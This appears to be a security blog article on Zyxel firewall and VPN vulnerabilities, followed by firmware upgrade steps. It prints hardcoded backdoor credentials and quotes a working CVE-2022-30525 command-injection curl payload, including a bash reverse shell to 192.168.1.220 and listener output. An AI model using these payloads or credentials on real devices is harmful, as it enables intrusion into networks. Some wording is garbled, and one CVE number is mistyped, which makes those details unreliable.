Account Discovered More Than Zyxel VPN: Effective Fixes

Backdoor account discovered more than Zyxel VPN as there was a discreet account in more than 100,000 Zyxel VPN gateways, firewalls, and access point controllers.

This hardcoded backdoor contains admin-level access that could make it easy for attackers to plant vulnerabilities into the affected Zyxel accounts.

Let’s dive deeper into how the vulnerability was discovered and what you need to do to protect your Zyxel account.

Discovering the Zyxel VPN Vulnerability

The backdoor Zyxel VPN vulnerability was discovered at Eye Control by a team of Dutch security experts. These security researchers considered the discreet account to be one of the worst vulnerabilities possible as it provides malicious attackers with the ability to gain root access to devices.

These are the devices that have Zyxel’s VPN gateways, firewalls, and access point controllers installed on them. Attackers can use the account to gain entry into affected devices through the web administration panel or SSH interface.

According to the Eye Control researchers, the backdoor, which was tracked as the CVE-2020-295383, was easy for them to discover. The account was noted to use “zyfwp” as its username and “PrOw!aN_fXp” as its password.

The researchers also reported that the password was visible in plain text in one of the system’s binaries. They also noted that the reason why the backdoor has root access to different devices is that it was responsible for the installation of firmware updates on other Zyxel devices through FTP.

– Affected Modules

The modules affected by the vulnerability included many of Zyxel’s top-of-the-line products utilized by government networks, private enterprises, and many other business-grade devices. The affected product lines include:

• The VPN series, which is used as a VPN gateway.
• The Unified Security Gateway series, otherwise known as the USG series; these series are used as a hybrid VPN gateway and firewall.
• The NXC series, which serves as a WLAN access point controller.
• The USG FLEX series, which works as a hybrid VPN gateway and firewall.
• The Advanced Threat Protection series, also known as the ATP series, which is used mainly as a firewall.

Many of these devices are utilized by delicate parts of a company’s network. Once they are compromised, attackers will be able to gain remote access, equipping them with the ability to launch and pivot more attacks against internal hosts. Zyxel has since released patches for all affected modules so users are advised to download the required patches.

– Other Backdoor Issues CVE-2016-10401

This isn’t the first time Zyxel is experiencing a vulnerability issue. The company had a secret backdoor mechanism issue in 2016 that allowed anyone with access to elevate accounts using Zyxel devices to the root level. This vulnerability was tracked as the CVE-2016-10401 and it had the superuser password “zyad5001.”

However, the CVE-2020-29583 is more serious than the CVE-2016-10401 because while the 2016 backdoor mechanism needed the attackers to first gain access to low-level accounts on Zyxel devices before elevating it to root and doing some serious damage, the 2020 version gave attackers a more direct approach without any conditions.

Also, unlike the CVE-2016-10401 which mostly affected only home routers, CVE-2020-29583 affected a wider range of devices.

This reach allowed the attackers to gain access to a wider variety of victims, many of which were corporate entities since most of the devices affected by the vulnerability are utilized by companies to control those who can access their internal and intranet networks from remote areas.

– Backdoor Issue CVE-2022-30525

Recently, Rapid7, a threat detection and cloud risk management company, detected another vulnerability that affects Zyxel firewalls, especially those supporting the Zero Touch Provisioning, also known as ZTP. In this case, three of Zyxel’s products were affected, including the VPN series, the USG FLEX series, and the ATP series.

Tracked as CVE-2022-30525, this vulnerability made it easy for unauthorized attackers to remotely conduct arbitrary code execution, allowing them to act as a nobody user on any affected device. The affected modules and firmware versions include the following:

• ATP 800, 700, 500, 200, 100: ZLD5.10 to ZLD5.21 Patch 1
• USG20W-VPN, USG20-VPN: ZLD5.10 to Z:D5.21 Patch 1
• USG FLEX 700, 500, 200, 100W, 100: ZLD5.00 to ZLD5.21 Patch 1

– Affected Devices

The devices affected by the most recent Zyxel vulnerabilities are those utilized for both corporate and branch headquarters deployments.

These products are used for SSL inspection, VPN solutions, intrusion protection, email security, and web filtering, and they are advertised to provide up to 5Gbps throughput via the firewall. Many of these devices are quite popular with over 15,000 of them available on Shodan’s search results.

– How CVE-2022-30525 Worked

The affected devices were susceptible to unauthorized and remote command injections through their administrative HTTP interface. The commands were run as nobody users. Attackers exploited this vulnerability by using the /ztp/cgi-bin/handler URI and sending unsanitized attacker input to the os.system method available in lib_wan_settings-py.

This vulnerable functionality was utilized along with the setWanPortSt command, allowing the attackers to inject arbitrary commands into the data parameter or the mtu.

Here is an example curl by Rapid7 that causes the firewall to carry out ping 192.168.1.220:

curl -v –insecure -X POST -H “Content-Type: application/json”-d

‘{“command”:”setWanPortSt”,”proto”:”dhcp”,”port”:”4″,”vlan_tagged”:”1″,”vlanid”:”5″,”mtu”:”; ping 192.168.1.220;”,”data”:”hi”}’

https://192.168.1.1/ztp/cgi-bin/handler

The ps output on the firewall will look like this:

nobody 11040 0.0 0.2 21040 5152 ? S Apr10 0:00 \_ /usr/local/apache/bin/httpd -f /usr/local/zyxel-gui/httpd.conf -k graceful -DSSL

nobody 16052 56.4 0.6 18104 11224 ? S 06:16 0:02 | \_ /usr/bin/python /usr/local/zyxel-gui/htdocs/ztp/cgi-bin/handler.py

nobody 16055 0.0 0.0 3568 1492 ? S 06:16 0:00 | \_ sh -c /usr/sbin/sdwan_iface_ipc 11 WAN3 4 ; ping 192.168.1.220; 5 >/dev/null 2>&1

nobody 16057 0.0 0.0 2152 564 ? S 06:16 0:00 | \_ ping 192.168.1.220

You can then establish a reverse shell via the normal bash GTFOBin. For instance:

curl -v –insecure -XPOST-H”Content-Type: application/json”-d ‘

{“command”:”setWanPortSt”,”proto”:”dhcp”,”port”:”4″,”vlan_tagged”:

“1”,”vlanid”:”5″,”mtu”:”; bash -c \”exec bash -i &>/dev/tcp/

192.168.1.220/1270 <&1;\”;”,”data”:”hi”}’ https://192.168.1.1/ztp/cgi-bin/handler

The resulting reverse shell can then be utilized like this:

albinolobster@ubuntu:~$ nc -lvnp 1270

Listening on 0.0.0.0 1270

Connection received on 192.168.1.1 37882

bash: cannot setterminal process group (11037): Inappropriate ioctl fordevice

bash: no job control inthis shell

bash-5.1$ ididuid=99(nobody) gid=10003(shadowr) groups=99,10003(shadowr)

bash-5.1$ uname-a

uname-a

Linux usgflex100 3.10.87-rt80-Cavium-Octeon #2 SMP Tue Mar 15 05:14:51 CST 2022 mips64 Cavium Octeon III V0.2 FPU V0.0 ROUTER7000_REF (CN7020p1.2-1200-AAP) GNU/LinuxBash-5.1

How the Zyxel VPN Vulnerability Can Be Fixed

The Zyxel VPN vulnerability can be fixed by downloading the patches that the company has released to help resolve these security issues. Device owners are implored to update their systems as soon as they can to be less susceptible to malicious attacks.

Attacks can come from anyone, ranging from state-sponsored hacking groups to ransomware groups and DDoS botnet operators. They can abuse these backdoor accounts to gain access to vulnerable devices, pivoting internal networks for more attacks and exploits.

– Updating Your Security Gateway

To make sure you’re less susceptible to vulnerabilities, you need to upgrade the firmware of your security gateways as soon as you can.

The steps provided below will guide you on how to do so, whether you’re using a standalone device or a cloud-managed device.

– Upgrading a Standalone Device

You can upgrade the firmware of your standalone device by following the steps below:

• Log into your portal, click on “Devices Management,” and select “Firmware Download.”
• The download will start automatically and the file that’ll be downloaded will be in .zip format.
• Once the download is complete, extract the zip file into a new folder.
• Go back to your browser, enter your device’s IP address, and log in with your admin credentials.
• Now, navigate to “Maintenance” then click on “File Manger.”
• Select the “Configuration file,” tab, copy the startup-config.conf and rename it.
• Navigate to “Maintenance,” select “File Manager,” then go to the “Firmware Package” menu.
• Browse through your files to find the folder in which you extracted the downloaded zip file and select the .bin file in the folder.
• The firmware will be uploaded to your device via the web browser interface and then installed once the upload has been completed.
• Take note that the upload and installation may take some time, so make sure your web browser remains open and your device stays connected until the process is complete.
• You can check if the device is done with the upgrading process by constantly pinging your device with “ping ‘device IP’ -t.”
• For instance, if your device IP is 192.168.0.1, you can run constant pings with the command “ping 192.168.0.1. -t.”
• If you notice that some configuration points are missing or corrupted, or you notice that you can’t reach the website, then you may want to clear your browser cookies or utilize an incognito window.
• Once the firmware upgrade has been completed, you’ll be able to log into the device’s admin dashboard to see the new Firmware status.

– Upgrading Cloud-Managed Devices

You can upgrade your cloud-managed devices by following the steps below.

Take note that this upgrade method applies to all cloud-managed devices, whether it’s an NSG device, it uses an ATP gateway, or it’s managed by Nebula-Cloud-Center.

• The essential thing you want to do is check your device’s firmware version.
• You can check the firmware version by navigating to “Site-Wide” then “Monitor” and finally “Firmware Management.”
• If you use NSG, you can navigate to “Firewall” then click on “Monitor, ” select “Firewall // Security Gateway,” “Monitor,” and lastly, “Security Gateway.”
• If you get a “Not up to date” status, that means you’ll need to update your device.
• Navigate to the “Firmware management” page and click on “Firewall” through the checkbox.
• If an update is available, you’ll get the “Upgrade Now” button.
• Click on the button and the upgrade process will begin.

Conclusion

Vulnerabilities such as the ones that have happened to Zyxel are some of the primary sources of cyber espionage and ransomware attacks.

Here are some of the most essential points to keep in mind to make sure you’re safe from these vulnerabilities:

• These vulnerabilities can be used by hackers and ransomware gangs to take advantage of companies and government organizations.
• Affected products tend to include the VPN, ATP, and USG series.
• To keep your company and organization safe, make sure your Zyxel devices and systems are always up to date.
• Consult the company’s support team for your Zyxel VPN setup to reduce the chances of misinformation and malicious attacks.
• Make sure your Zyxel VPN download and other downloads are done on the company’s official website.

Many other devices from companies such as Cisco, MobileIron, and Pulse Secure have been exploited and used to attack government and corporate networks.

While Zyxel does a good job of fixing these issues as soon as they can, it’s still important for users to be aware to make sure their systems and devices are updated as soon as possible.